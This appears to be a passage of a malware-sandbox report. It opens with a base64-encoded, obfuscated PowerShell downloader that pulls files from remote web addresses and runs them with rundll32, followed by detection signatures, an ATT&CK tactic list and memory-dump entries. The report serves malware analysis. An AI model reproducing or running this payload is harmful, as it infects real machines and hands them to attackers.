ACcAKQAoACcAKQApACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAJwBkAGEAdABhAC0AcwAnACsAJwBnAHAALQBrACcAKwAnAGcAZgBpACcAKQArACcAZwAnACsAJwBxACcAKwAnAHEAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwBzADIAKQAoAEEAYQAnACkAKQArACcASwAnACsAJwBxACcAKwAoACgAJwBxACkAJwArACcAKABzACcAKQApACsAKAAoACcAMgApACcAKwAnACgAQAAnACkAKQArACcAaAB0ACcAKwAoACcAdAAnACsAJwBwAHMAJwApACsAKAAoACcAOgBxACcAKwAnAHEAKQAnACkAKQArACgAKAAnACgAcwAnACkAKQArACcAMgAnACsAKAAoACcAKQAoACcAKwAnAHEAJwApACkAKwAoACgAJwBxACkAKABzADIAJwArACcAKQAoAGUAYwAnACsAJwBvACcAKQApACsAJwBtAGQAJwArACgAJwBlACcAKwAnAG0AbwAyACcAKQArACcALgAnACsAKAAnAG8AJwArACcAZwBzACcAKQArACgAJwBkAGUAJwArACcAdgAnACkAKwAoACcALgBuAGUAJwArACcAdAAnACkAKwAoACgAJwBxAHEAKQAoACcAKwAnAHMAJwApACkAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAHcAcAAtAGMAJwArACcAbwAnACkAKQArACgAJwBuAHQAJwArACcAZQBuAHQAJwApACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAKABzACcAKwAnADIAKQAnACkAKQArACgAKAAnACgAegBXACcAKwAnAFcAQgBxACcAKQApACsAKAAoACcAcQApACcAKwAnACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKQApACkAKQAuACIAUgBFAGAAcABMAEEAYwBFACIAKAAoACgAJwBxAHEAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoACcAKwAnAHcAZQAnACkAKQBbADAAXQApAC4AIgBTAHAAYABsAEkAdAAiACgAJABJADkAYgA0ADMAbwByACAAKwAgACQAUgB1AGIANwBmAF8AcQAgACsAIAAkAFYAbgB1AHgAaAAwADkAKQA7ACQASAAyADIAOABoAG8AcwA9ACgAJwBUADUAJwArACgAJwA3ACcAKwAnAGwAawB4ACcAKQArACcAZAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEEAdQBxAHAAbAAzADMAIABpAG4AIAAkAEoANwBlAGoAcAA3AHMAIAB8ACAAUwBvAGAAUgBUAGAALQBvAGAAQgBgAGoARQBDAHQAIAB7AEcAZQBUAGAALQByAGAAQQBOAGAARABPAE0AfQApAHsAdAByAHkAewAkAFYAcgBjAGcAdQB5AGoALgAiAEQAbwB3AE4ATABgAE8AYABBAGQARgBJAGwARQAiACgAJABBAHUAcQBwAGwAMwAzACwAIAAkAEoAagBmADYAegBuADEAKQA7ACQAUwBkAGYAdgBuADgAMwA9ACgAKAAnAEcAJwArACcAdQBvAGYAJwApACsAJwBjACcAKwAnAHYAawAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQASgBqAGYANgB6AG4AMQApAC4AIgBMAEUATgBgAGcAdABIACIAIAAtAGcAZQAgADQAMAA1ADIAMgApACAAewAuACgAJwByAHUAbgAnACsAJwBkAGwAJwArACcAbAAzADIAJwApACAAJABKAGoAZgA2AHoAbgAxACwAJwAjADEAJwAuACIAVABvAFMAYABUAFIAYABJAE4ARwAiACgAKQA7ACQATAA1ADMAbwBhADQAOAA9ACgAKAAnAFQAYQAnACsAJwA5ACcAKQArACcAcwAnACsAKAAnAGYAJwArACcAYgBoACcAKQApADsAYgByAGUAYQBrADsAJABaADgAZAA0AG0AZwBvAD0AKAAoACcARgAnACsAJwB5AHkAYQAnACkAKwAoACcAbgAnACsAJwBpAGgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAcwA1ADQAbABnADEAPQAoACcARwAnACsAKAAnAGcAdwAnACsAJwA3ADUAJwApACsAJwBhAGQAJwApAA==Blocklisted process makes network requestSuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Collection
Command and Control
Credential Access
Defense Evasion
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Replay Monitor
00:00
00:00
Downloads
-
memory/3168-8-0x0000000000000000-mapping.dmp
-
memory/4304-11-0x00000231A94A0000-0x00000231A94A1000-memory.dmpFilesize
4KB
-
memory/4304-9-0x0000000000000000-mapping.dmp
-
memory/4304-10-0x00007FFEDDDE0000-0x00007FFEDE7CC000-memory.dmpFilesize
9MB
-
memory/4304-13-0x0000023190DF3000-0x0000023190DF5000-memory.dmpFilesize
8KB
-
memory/4304-12-0x0000023190DF0000-0x0000023190DF2000-memory.dmpFilesize
8KB
-
memory/4304-14-0x00000231A97B0000-0x00000231A97B1000-memory.dmpFilesize
4KB
-
memory/4304-15-0x0000023190DF6000-0x0000023190DF8000-memory.dmpFilesize
8KB
-
memory/4728-4-0x00007FFEC57A0000-0x00007FFEC57B0000-memory.dmpFilesize
64KB
-
memory/4728-5-0x00007FFEC57A0000-0x00007FFEC57B0000-memory.dmpFilesize
64KB
-
memory/4728-6-0x00007FFEE49A0000-0x00007FFEE4FD7000-memory.dmpFilesize
6MB
-
memory/4728-7-0x0000016837530000-0x0000016837534000-memory.dmpFilesize
16KB
-
memory/4728-3-0x00007FFEC57A0000-0x00007FFEC57B0000-memory.dmpFilesize
64KB
-
memory/4728-2-0x00007FFEC57A0000-0x00007FFEC57B0000-memory.dmpFilesize
64KB
Loading data